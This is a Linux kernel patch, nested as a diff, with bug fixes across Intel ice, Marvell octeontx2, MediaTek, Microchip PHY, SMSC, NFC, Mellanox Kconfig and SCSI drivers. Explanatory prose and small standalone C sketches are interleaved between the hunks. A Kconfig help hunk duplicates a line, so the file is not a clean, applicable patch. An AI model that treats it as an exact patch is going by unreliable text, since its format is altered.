+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+index e1f6373a3a2c0..02eb78df2378e 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+@@ -4145,6 +4145,8 @@ ice_get_module_eeprom(struct net_device *netdev,
+ 		 * SFP modules only ever use page 0.
+ 		 */
+ 		if (page == 0 || !(data[0x2] & 0x4)) {
++			u32 copy_len;
++

+			/* If the i2c bus is busy due to a slow page change or
+			 * link management access, the call can fail. This is
+			 * normal, so we retry a few times.
+@@ -4168,8 +4170,8 @@ ice_get_module_eeprom(struct net_device *netdev,
+ 			}
+ 
+ 			/* Make sure we have enough room for the new block */
+-			if ((i + SFF_READ_BLOCK_SIZE) < ee->len)
+-				memcpy(data + i, value, SFF_READ_BLOCK_SIZE);
++			copy_len = min_t(u32, SFF_READ_BLOCK_SIZE, ee->len - i);
++			memcpy(data + i, value, copy_len);
+ 		}
+ 	}
+ 	return 0;
+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index f68c555be4e9a..71cb15fcf63b9 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+@@ -1322,8 +1322,8 @@ ice_parse_cls_flower(struct net_device *filter_dev, struct ice_vsi *vsi,
+ 		if (match.mask->vlan_priority) {
+ 			fltr->flags |= ICE_TC_FLWR_FIELD_VLAN_PRIO;
+ 			headers->vlan_hdr.vlan_prio =
+-				cpu_to_be16((match.key->vlan_priority <<
+-					     VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK);
++				be16_encode_bits(match.key->vlan_priority,
++						 VLAN_PRIO_MASK);
+ 		}
+ 
+ 		if (match.mask->vlan_tpid)
+@@ -1356,8 +1356,8 @@ ice_parse_cls_flower(struct net_device *filter_dev, struct ice_vsi *vsi,
+ 		if (match.mask->vlan_priority) {
+ 			fltr->flags |= ICE_TC_FLWR_FIELD_CVLAN_PRIO;
+ 			headers->cvlan_hdr.vlan_prio =
+-				cpu_to_be16((match.key->vlan_priority <<
+-					     VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK);
++				be16_encode_bits(match.key->vlan_priority,
++						 VLAN_PRIO_MASK);
+ 		}
+ 	}
+ 
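
be16_encode_bits(), used above, derives the shift from the mask itself and returns the field in big-endian byte order, equivalent to the open-coded shift/mask/cpu_to_be16() it replaces. A self-contained sketch with plain-C stand-ins for the kernel helpers follows; a little-endian host is assumed for the byte swap.

#include <stdio.h>
#include <stdint.h>

#define VLAN_PRIO_MASK  0xe000
#define VLAN_PRIO_SHIFT 13

static uint16_t cpu_to_be16(uint16_t v)   /* stand-in; little-endian host assumed */
{
	return (uint16_t)((v << 8) | (v >> 8));
}

static uint16_t be16_encode_bits(uint16_t val, uint16_t mask)
{
	unsigned int shift = __builtin_ctz(mask);   /* lowest set bit of the mask */

	return cpu_to_be16((uint16_t)((val << shift) & mask));
}

int main(void)
{
	uint16_t prio = 5;

	/* Both forms produce the same on-wire encoding of the PCP field. */
	printf("%#x\n", be16_encode_bits(prio, VLAN_PRIO_MASK));
	printf("%#x\n", cpu_to_be16((uint16_t)((prio << VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK)));
	return 0;
}
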
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index 76474385a6027..b07c6f51b461b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -859,6 +859,9 @@ int rvu_cpt_lf_teardown(struct rvu *rvu, u16 pcifunc, int blkaddr, int lf,
+ 			int slot);
+ int rvu_cpt_ctx_flush(struct rvu *rvu, u16 pcifunc);
+ 
++#define NDC_AF_BANK_MASK       GENMASK_ULL(7, 0)
++#define NDC_AF_BANK_LINE_MASK  GENMASK_ULL(31, 16)
++
+ /* CN10K RVU */
+ int rvu_set_channels_base(struct rvu *rvu);
+ void rvu_program_channels(struct rvu *rvu);
+@@ -874,6 +877,8 @@ static inline void rvu_dbg_init(struct rvu *rvu) {}
+ static inline void rvu_dbg_exit(struct rvu *rvu) {}
+ #endif
+ 
++int rvu_ndc_fix_locked_cacheline(struct rvu *rvu, int blkaddr);
++
+ /* RVU Switch */
+ void rvu_switch_enable(struct rvu *rvu);
+ void rvu_switch_disable(struct rvu *rvu);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index f66dde2b0f926..abef0fd4259a3 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -198,9 +198,6 @@ enum cpt_eng_type {
+ 	CPT_IE_TYPE = 3,
+ };
+ 
+-#define NDC_MAX_BANK(rvu, blk_addr) (rvu_read64(rvu, \
+-						blk_addr, NDC_AF_CONST) & 0xFF)
+-
+ #define rvu_dbg_NULL NULL
+ #define rvu_dbg_open_NULL NULL
+ 
+@@ -1448,6 +1445,7 @@ static int ndc_blk_hits_miss_stats(struct seq_file *s, int idx, int blk_addr)
+ 	struct nix_hw *nix_hw;
+ 	struct rvu *rvu;
+ 	int bank, max_bank;
++	u64 ndc_af_const;
+ 
+ 	if (blk_addr == BLKADDR_NDC_NPA0) {
+ 		rvu = s->private;
+@@ -1456,7 +1454,8 @@ static int ndc_blk_hits_miss_stats(struct seq_file *s, int idx, int blk_addr)
+ 		rvu = nix_hw->rvu;
+ 	}
+ 
+-	max_bank = NDC_MAX_BANK(rvu, blk_addr);
++	ndc_af_const = rvu_read64(rvu, blk_addr, NDC_AF_CONST);
++	max_bank = FIELD_GET(NDC_AF_BANK_MASK, ndc_af_const);
+ 	for (bank = 0; bank < max_bank; bank++) {
+ 		seq_printf(s, "BANK:%d\n", bank);
+ 		seq_printf(s, "\tHits:\t%lld\n",
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index a62c1b3220120..84f2ba53b8b68 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -790,6 +790,7 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 	struct nix_aq_res_s *result;
+ 	int timeout = 1000;
+ 	u64 reg, head;
++	int ret;
+ 
+ 	result = (struct nix_aq_res_s *)aq->res->base;
+ 
+@@ -813,9 +814,22 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 			return -EBUSY;
+ 	}
+ 
+-	if (result->compcode != NIX_AQ_COMP_GOOD)
++	if (result->compcode != NIX_AQ_COMP_GOOD) {
+ 		/* TODO: Replace this with some error code */
++		if (result->compcode == NIX_AQ_COMP_CTX_FAULT ||
++		    result->compcode == NIX_AQ_COMP_LOCKERR ||
++		    result->compcode == NIX_AQ_COMP_CTX_POISON) {
++			ret = rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX0_RX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX0_TX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX1_RX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX1_TX);
++			if (ret)
++				dev_err(rvu->dev,
++					"%s: Not able to unlock cachelines\n", __func__);
++		}
++
+ 		return -EBUSY;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
+index 70bd036ed76e4..4f5ca5ab13a40 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
+@@ -4,7 +4,7 @@
+  * Copyright (C) 2018 Marvell.
+  *
+  */
+-
++#include <linux/bitfield.h>
+ #include <linux/module.h>
+ #include <linux/pci.h>
+ 
+@@ -42,9 +42,18 @@ static int npa_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 			return -EBUSY;
+ 	}
+ 
+-	if (result->compcode != NPA_AQ_COMP_GOOD)
++	if (result->compcode != NPA_AQ_COMP_GOOD) {
+ 		/* TODO: Replace this with some error code */
++		if (result->compcode == NPA_AQ_COMP_CTX_FAULT ||
++		    result->compcode == NPA_AQ_COMP_LOCKERR ||
++		    result->compcode == NPA_AQ_COMP_CTX_POISON) {
++			if (rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NPA0))
++				dev_err(rvu->dev,
++					"%s: Not able to unlock cachelines\n", __func__);
++		}
++
+ 		return -EBUSY;
++	}
+ 
+ 	return 0;
+ }
+@@ -545,3 +554,48 @@ void rvu_npa_lf_teardown(struct rvu *rvu, u16 pcifunc, int npalf)
+ 
+ 	npa_ctx_free(rvu, pfvf);
+ }
++
++/* Due to a hardware erratum, in some corner cases, AQ context lock
++ * operations can result in an NDC way getting into an illegal state
++ * of not valid but locked.
++ *
++ * This API solves the problem by clearing the lock bit of the NDC block.
++ * The operation needs to be done for each line of all the NDC banks.
++ */
++int rvu_ndc_fix_locked_cacheline(struct rvu *rvu, int blkaddr)
++{
++	int bank, max_bank, line, max_line, err;
++	u64 reg, ndc_af_const;
++
++	/* Set the ENABLE bit(63) to '0' */
++	reg = rvu_read64(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL);
++	rvu_write64(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL, reg & GENMASK_ULL(62, 0));
++
++	/* Poll until the BUSY bits(47:32) are set to '0' */
++	err = rvu_poll_reg(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL, GENMASK_ULL(47, 32), true);
++	if (err) {
++		dev_err(rvu->dev, "Timed out while polling for NDC CAM busy bits.\n");
++		return err;
++	}
++
++	ndc_af_const = rvu_read64(rvu, blkaddr, NDC_AF_CONST);
++	max_bank = FIELD_GET(NDC_AF_BANK_MASK, ndc_af_const);
++	max_line = FIELD_GET(NDC_AF_BANK_LINE_MASK, ndc_af_const);
++	for (bank = 0; bank < max_bank; bank++) {
++		for (line = 0; line < max_line; line++) {
++			/* Check whether 'cache line valid bit(63)' is not
++			 * set but 'cache line lock bit(60)' is set; if so,
++			 * clear the lock bit(60).
++			 */
++			reg = rvu_read64(rvu, blkaddr,
++					 NDC_AF_BANKX_LINEX_METADATA(bank, line));
++			if (!(reg & BIT_ULL(63)) && (reg & BIT_ULL(60))) {
++				rvu_write64(rvu, blkaddr,
++					    NDC_AF_BANKX_LINEX_METADATA(bank, line),
++					    reg & ~BIT_ULL(60));
++			}
++		}
++	}
++
++	return 0;
++}
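
The new helper decodes NDC_AF_CONST with GENMASK_ULL()/FIELD_GET(): a contiguous bit mask describes each field, and the extraction shifts right by the mask's lowest set bit. A self-contained sketch with plain-C equivalents follows; the register value below is hypothetical.

#include <stdio.h>
#include <stdint.h>

#define GENMASK_ULL(h, l) \
	(((~0ULL) >> (63 - (h))) & ((~0ULL) << (l)))

#define NDC_AF_BANK_MASK       GENMASK_ULL(7, 0)
#define NDC_AF_BANK_LINE_MASK  GENMASK_ULL(31, 16)

static uint64_t field_get(uint64_t mask, uint64_t reg)
{
	return (reg & mask) >> __builtin_ctzll(mask);   /* shift by mask's low bit */
}

int main(void)
{
	uint64_t ndc_af_const = 0x01000004ULL;   /* hypothetical: 4 banks, 256 lines */

	printf("banks=%llu lines=%llu\n",
	       (unsigned long long)field_get(NDC_AF_BANK_MASK, ndc_af_const),
	       (unsigned long long)field_get(NDC_AF_BANK_LINE_MASK, ndc_af_const));
	return 0;
}
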
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+index 0e0d536645ac7..39f7a7cb27558 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+@@ -690,6 +690,7 @@
+ #define NDC_AF_INTR_ENA_W1S		(0x00068)
+ #define NDC_AF_INTR_ENA_W1C		(0x00070)
+ #define NDC_AF_ACTIVE_PC		(0x00078)
++#define NDC_AF_CAMS_RD_INTERVAL		(0x00080)
+ #define NDC_AF_BP_TEST_ENABLE		(0x001F8)
+ #define NDC_AF_BP_TEST(a)		(0x00200 | (a) << 3)
+ #define NDC_AF_BLK_RST			(0x002F0)
+@@ -705,6 +706,8 @@
+ 		(0x00F00 | (a) << 5 | (b) << 4)
+ #define NDC_AF_BANKX_HIT_PC(a)		(0x01000 | (a) << 3)
+ #define NDC_AF_BANKX_MISS_PC(a)		(0x01100 | (a) << 3)
++#define NDC_AF_BANKX_LINEX_METADATA(a, b) \
++		(0x10000 | (a) << 12 | (b) << 3)
+ 
+ /* LBK */
+ #define LBK_CONST			(0x10ull)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 53ee9dea66388..49975924e2426 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -561,7 +561,8 @@ static int mtk_mac_finish(struct phylink_config *config, unsigned int mode,
+ 	mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+ 	mcr_new = mcr_cur;
+ 	mcr_new |= MAC_MCR_IPG_CFG | MAC_MCR_FORCE_MODE |
+-		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK;
++		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK |
++		   MAC_MCR_RX_FIFO_CLR_DIS;
+ 
+ 	/* Only update control register when needed! */
+ 	if (mcr_new != mcr_cur)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index 306fdc2c608a4..dafa9a0baa58c 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -357,6 +357,7 @@
+ #define MAC_MCR_FORCE_MODE	BIT(15)
+ #define MAC_MCR_TX_EN		BIT(14)
+ #define MAC_MCR_RX_EN		BIT(13)
++#define MAC_MCR_RX_FIFO_CLR_DIS	BIT(12)
+ #define MAC_MCR_BACKOFF_EN	BIT(9)
+ #define MAC_MCR_BACKPR_EN	BIT(8)
+ #define MAC_MCR_FORCE_RX_FC	BIT(5)
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_police.c b/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
+index a9aec900d608d..7d66fe75cd3bf 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
+@@ -194,7 +194,7 @@ int lan966x_police_port_del(struct lan966x_port *port,
+ 		return -EINVAL;
+ 	}
+ 
+-	err = lan966x_police_del(port, port->tc.police_id);
++	err = lan966x_police_del(port, POL_IDX_PORT + port->chip_port);
+ 	if (err) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "Failed to delete policer from port");
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 84e1740b12f1b..3c1d4b27668fe 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1168,6 +1168,7 @@ static int stmmac_init_phy(struct net_device *dev)
+ 
+ 		phylink_ethtool_get_wol(priv->phylink, &wol);
+ 		device_set_wakeup_capable(priv->device, !!wol.supported);
++		device_set_wakeup_enable(priv->device, !!wol.wolopts);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/net/phy/microchip.c b/drivers/net/phy/microchip.c
+index ccecee2524ce6..0b88635f4fbca 100644
+--- a/drivers/net/phy/microchip.c
++++ b/drivers/net/phy/microchip.c
+@@ -342,6 +342,37 @@ static int lan88xx_config_aneg(struct phy_device *phydev)
+ 	return genphy_config_aneg(phydev);
+ }
+ 
++static void lan88xx_link_change_notify(struct phy_device *phydev)
++{
++	int temp;
++
++	/* In forced 100 F/H mode, the chip may fail to set the mode
++	 * correctly when the cable is switched between a long (~50+ m)
++	 * and a short one. As a workaround, set the speed to 10 before
++	 * setting it to 100 in forced 100 F/H mode.
++	 */
++	if (!phydev->autoneg && phydev->speed == 100) {
++		/* disable phy interrupt */
++		temp = phy_read(phydev, LAN88XX_INT_MASK);
++		temp &= ~LAN88XX_INT_MASK_MDINTPIN_EN_;
++		phy_write(phydev, LAN88XX_INT_MASK, temp);
++
++		temp = phy_read(phydev, MII_BMCR);
++		temp &= ~(BMCR_SPEED100 | BMCR_SPEED1000);
++		phy_write(phydev, MII_BMCR, temp); /* set to 10 first */
++		temp |= BMCR_SPEED100;
++		phy_write(phydev, MII_BMCR, temp); /* set to 100 later */
++
++		/* clear pending interrupt generated while workaround */
++		temp = phy_read(phydev, LAN88XX_INT_STS);
++
++		/* enable phy interrupt back */
++		temp = phy_read(phydev, LAN88XX_INT_MASK);
++		temp |= LAN88XX_INT_MASK_MDINTPIN_EN_;
++		phy_write(phydev, LAN88XX_INT_MASK, temp);
++	}
++}
++
+ static struct phy_driver microchip_phy_driver[] = {
+ {
+ 	.phy_id		= 0x0007c132,
+@@ -359,6 +390,7 @@ static struct phy_driver microchip_phy_driver[] = {
+ 
+ 	.config_init	= lan88xx_config_init,
+ 	.config_aneg	= lan88xx_config_aneg,
++	.link_change_notify = lan88xx_link_change_notify,
+ 
+ 	.config_intr	= lan88xx_phy_config_intr,
+ 	.handle_interrupt = lan88xx_handle_interrupt,
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 8cff61dbc4b57..7fbb0904b3c0f 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -3041,8 +3041,6 @@ static int phy_probe(struct device *dev)
+ 	if (phydrv->flags & PHY_IS_INTERNAL)
+ 		phydev->is_internal = true;
+ 
+-	mutex_lock(&phydev->lock);
+-
+ 	/* Deassert the reset signal */
+ 	phy_device_reset(phydev, 0);
+ 
+@@ -3110,12 +3108,10 @@ static int phy_probe(struct device *dev)
+ 	phydev->state = PHY_READY;
+ 
+ out:
+-	/* Assert the reset signal */
++	/* Re-assert the reset signal on error */
+ 	if (err)
+ 		phy_device_reset(phydev, 1);
+ 
+-	mutex_unlock(&phydev->lock);
+-
+ 	return err;
+ }
+ 
+@@ -3125,9 +3121,7 @@ static int phy_remove(struct device *dev)
+ 
+ 	cancel_delayed_work_sync(&phydev->state_queue);
+ 
+-	mutex_lock(&phydev->lock);
+ 	phydev->state = PHY_DOWN;
+-	mutex_unlock(&phydev->lock);
+ 
+ 	sfp_bus_del_upstream(phydev->sfp_bus);
+ 	phydev->sfp_bus = NULL;
+diff --git a/drivers/net/phy/smsc.c b/drivers/net/phy/smsc.c
+index ac7481ce2fc16..00d9eff91dcfa 100644
+--- a/drivers/net/phy/smsc.c
++++ b/drivers/net/phy/smsc.c
+@@ -44,7 +44,6 @@ static struct smsc_hw_stat smsc_hw_stats[] = {
+ };
+ 
+ struct smsc_phy_priv {
+-	u16 intmask;
+ 	bool energy_enable;
+ };
+ 
+@@ -57,7 +56,6 @@ static int smsc_phy_ack_interrupt(struct phy_device *phydev)
+ 
+ static int smsc_phy_config_intr(struct phy_device *phydev)
+ {
+-	struct smsc_phy_priv *priv = phydev->priv;
+ 	int rc;
+ 
+ 	if (phydev->interrupts == PHY_INTERRUPT_ENABLED) {
+@@ -65,14 +63,9 @@ static int smsc_phy_config_intr(struct phy_device *phydev)
+ 		if (rc)
+ 			return rc;
+ 
+-		priv->intmask = MII_LAN83C185_ISF_INT4 | MII_LAN83C185_ISF_INT6;
+-		if (priv->energy_enable)
+-			priv->intmask |= MII_LAN83C185_ISF_INT7;
+-
+-		rc = phy_write(phydev, MII_LAN83C185_IM, priv->intmask);
++		rc = phy_write(phydev, MII_LAN83C185_IM,
++			       MII_LAN83C185_ISF_INT_PHYLIB_EVENTS);
+ 	} else {
+-		priv->intmask = 0;
+-
+ 		rc = phy_write(phydev, MII_LAN83C185_IM, 0);
+ 		if (rc)
+ 			return rc;
+@@ -85,7 +78,6 @@ static int smsc_phy_config_intr(struct phy_device *phydev)
+ 
+ static irqreturn_t smsc_phy_handle_interrupt(struct phy_device *phydev)
+ {
+-	struct smsc_phy_priv *priv = phydev->priv;
+ 	int irq_status;
+ 
+ 	irq_status = phy_read(phydev, MII_LAN83C185_ISF);
+@@ -96,7 +88,7 @@ static irqreturn_t smsc_phy_handle_interrupt(struct phy_device *phydev)
+ 		return IRQ_NONE;
+ 	}
+ 
+-	if (!(irq_status & priv->intmask))
++	if (!(irq_status & MII_LAN83C185_ISF_INT_PHYLIB_EVENTS))
+ 		return IRQ_NONE;
+ 
+ 	phy_trigger_machine(phydev);
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index f18ab8e220db7..068488890d57b 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -2115,33 +2115,8 @@ static void lan78xx_remove_mdio(struct lan78xx_net *dev)
+ static void lan78xx_link_status_change(struct net_device *net)
+ {
+ 	struct phy_device *phydev = net->phydev;
+-	int temp;
+-
+-	/* At forced 100 F/H mode, chip may fail to set mode correctly
+-	 * when cable is switched between long(~50+m) and short one.
+-	 * As workaround, set to 10 before setting to 100
+-	 * at forced 100 F/H mode.
+-	 */
+-	if (!phydev->autoneg && (phydev->speed == 100)) {
+-		/* disable phy interrupt */
+-		temp = phy_read(phydev, LAN88XX_INT_MASK);
+-		temp &= ~LAN88XX_INT_MASK_MDINTPIN_EN_;
+-		phy_write(phydev, LAN88XX_INT_MASK, temp);
+ 
+-		temp = phy_read(phydev, MII_BMCR);
+-		temp &= ~(BMCR_SPEED100 | BMCR_SPEED1000);
+-		phy_write(phydev, MII_BMCR, temp); /* set to 10 first */
+-		temp |= BMCR_SPEED100;
+-		phy_write(phydev, MII_BMCR, temp); /* set to 100 later */
+-
+-		/* clear pending interrupt generated while workaround */
+-		temp = phy_read(phydev, LAN88XX_INT_STS);
+-
+-		/* enable phy interrupt back */
+-		temp = phy_read(phydev, LAN88XX_INT_MASK);
+-		temp |= LAN88XX_INT_MASK_MDINTPIN_EN_;
+-		phy_write(phydev, LAN88XX_INT_MASK, temp);
+-	}
++	phy_print_status(phydev);
+ }
+ 
+ static int irq_map(struct irq_domain *d, unsigned int irq,
+diff --git a/drivers/nfc/fdp/i2c.c b/drivers/nfc/fdp/i2c.c
+index 2d53e0f88d2f9..1e0f2297f9c66 100644
+--- a/drivers/nfc/fdp/i2c.c
++++ b/drivers/nfc/fdp/i2c.c
+@@ -247,6 +247,9 @@ static void fdp_nci_i2c_read_device_properties(struct device *dev,
+ 					   len, sizeof(**fw_vsc_cfg),
+ 					   GFP_KERNEL);
+ 
++		if (!*fw_vsc_cfg)
++			goto alloc_err;
++
+ 		r = device_property_read_u8_array(dev, FDP_DP_FW_VSC_CFG_NAME,
+ 						  *fw_vsc_cfg, len);
+ 
+@@ -260,6 +263,7 @@ vsc_read_err:
+ 		*fw_vsc_cfg = NULL;
+ 	}
+ 
++alloc_err:
+ 	dev_dbg(dev, "Clock type: %d, clock frequency: %d, VSC: %s",
+ 		*clock_type, *clock_freq, *fw_vsc_cfg != NULL ? "yes" : "no");
+ }
+diff --git a/drivers/platform/mellanox/Kconfig b/drivers/platform/mellanox/Kconfig
+index 09c7829e95c4b..382793e73a60a 100644
+--- a/drivers/platform/mellanox/Kconfig
++++ b/drivers/platform/mellanox/Kconfig
+@@ -16,17 +16,17 @@ if MELLANOX_PLATFORM
+ 
+ config MLXREG_HOTPLUG
+ 	tristate "Mellanox platform hotplug driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
++	select REGMAP
+ 	help
+ 	  This driver handles hot-plug events for the power suppliers, power
+ 	  This driver handles hot-plug events for the power supplies, power
+ 	  cables and fans on a wide range of Mellanox IB and Ethernet systems.
+ config MLXREG_IO
+ 	tristate "Mellanox platform register access driver support"
+-	depends on REGMAP
+ 	depends on HWMON
++	select REGMAP
+ 	help
+ 	  This driver allows access to Mellanox programmable device register
+ 	  space through sysfs interface. The sets of registers for sysfs access
+@@ -36,9 +36,9 @@ config MLXREG_IO
+ 
+ config MLXREG_LC
+ 	tristate "Mellanox line card platform driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
++	select REGMAP
+ 	help
+ 	  This driver provides support for the Mellanox MSN4800-XX line cards,
+ 	  which are the part of MSN4800 Ethernet modular switch systems
+@@ -80,10 +80,9 @@ config MLXBF_PMC
+ 
+ config NVSW_SN2201
+ 	tristate "Nvidia SN2201 platform driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
+-	depends on REGMAP_I2C
++	select REGMAP_I2C
+ 	help
+ 	  This driver provides support for the Nvidia SN2201 platform.
+	  The SN2201 is a highly integrated one-rack-unit system with
+diff --git a/drivers/platform/x86/Kconfig b/drivers/platform/x86/Kconfig
+index f5312f51de19f..b02a8125bc7d5 100644
+--- a/drivers/platform/x86/Kconfig
++++ b/drivers/platform/x86/Kconfig
+@@ -997,7 +997,8 @@ config SERIAL_MULTI_INSTANTIATE
+ 
+ config MLX_PLATFORM
+ 	tristate "Mellanox Technologies platform support"
+-	depends on I2C && REGMAP
++	depends on I2C
++	select REGMAP
+ 	help
+ 	  This option enables system support for the Mellanox Technologies
+ 	  platform. The Mellanox systems provide data center networking
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 9857dba09c951..85e66574ec414 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -181,6 +181,7 @@ void scsi_remove_host(struct Scsi_Host *shost)
+ 	scsi_forget_host(shost);
+ 	mutex_unlock(&shost->scan_mutex);
+ 	scsi_proc_host_rm(shost);
++	scsi_proc_hostdir_rm(shost->hostt);
+ 
+ 	/*
+ 	 * New SCSI devices cannot be attached anymore because of the SCSI host
+@@ -340,6 +341,7 @@ static void scsi_host_dev_release(struct device *dev)
+ 	struct Scsi_Host *shost = dev_to_shost(dev);
+ 	struct device *parent = dev->parent;
+ 
++	/* In case scsi_remove_host() has not been called. */
+ 	scsi_proc_hostdir_rm(shost->hostt);
+ 
+ 	/* Wait for functions invoked through call_rcu(&scmd->rcu, ...) */
+diff --git a/drivers/scsi/megaraid/megaraid_sas.h b/drivers/scsi/megaraid/megaraid_sas.h
+index 4919ea54b8277..2ef9d41fc6f42 100644
+--- a/drivers/scsi/megaraid/megaraid_sas.h
++++ b/drivers/scsi/megaraid/megaraid_sas.h
+@@ -1519,6 +1519,8 @@ struct megasas_ctrl_info {
+ #define MEGASAS_MAX_LD_IDS			(MEGASAS_MAX_LD_CHANNELS * \
+ 						MEGASAS_MAX_DEV_PER_CHANNEL)
+ 
++#define MEGASAS_MAX_SUPPORTED_LD_IDS		240
++
+ #define MEGASAS_MAX_SECTORS                    (2*1024)
+ #define MEGASAS_MAX_SECTORS_IEEE		(2*128)
+ #define MEGASAS_DBG_LVL				1
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fp.c b/drivers/scsi/megaraid/megaraid_sas_fp.c
+index da1cad1ee1238..4463a538102ad 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fp.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fp.c
+@@ -358,7 +358,7 @@ u8 MR_ValidateMapInfo(struct megasas_instance *instance, u64 map_id)
+ 		ld = MR_TargetIdToLdGet(i, drv_map);
+ 
+ 		/* For non existing VDs, iterate to next VD*/
+-		if (ld >= (MAX_LOGICAL_DRIVES_EXT - 1))
++		if (ld >= MEGASAS_MAX_SUPPORTED_LD_IDS)
+ 			continue;
+ 
+ 		raid = MR_LdRaidGet(ld, drv_map);
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index eb76ba0550216..e934779bf05c8 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -2933,8 +2933,13 @@ static void sd_read_block_characteristics(struct scsi_disk *sdkp)
+ 	}
+ 
+ 	if (sdkp->device->type == TYPE_ZBC) {
+-		/* Host-managed */
++		/*
++		 * Host-managed: Per ZBC and ZAC specifications, writes in
++		 * sequential write required zones of host-managed devices must
++		 * be aligned to the device physical block size.
++		 */
+ 		disk_set_zoned(sdkp->disk, BLK_ZONED_HM);
++		blk_queue_zone_write_granularity(q, sdkp->physical_block_size);
+ 	} else {
+ 		sdkp->zoned = zoned;
+ 		if (sdkp->zoned == 1) {
+diff --git a/drivers/scsi/sd_zbc.c b/drivers/scsi/sd_zbc.c
+index bd15624c63228..4c35b4a916355 100644
+--- a/drivers/scsi/sd_zbc.c
++++ b/drivers/scsi/sd_zbc.c
+@@ -956,14 +956,6 @@ int sd_zbc_read_zones(struct scsi_disk *sdkp, u8 buf[SD_BUF_SIZE])
+ 	disk_set_max_active_zones(disk, 0);
+ 	nr_zones = round_up(sdkp->capacity, zone_blocks) >> ilog2(zone_blocks);
+ 
+-	/*
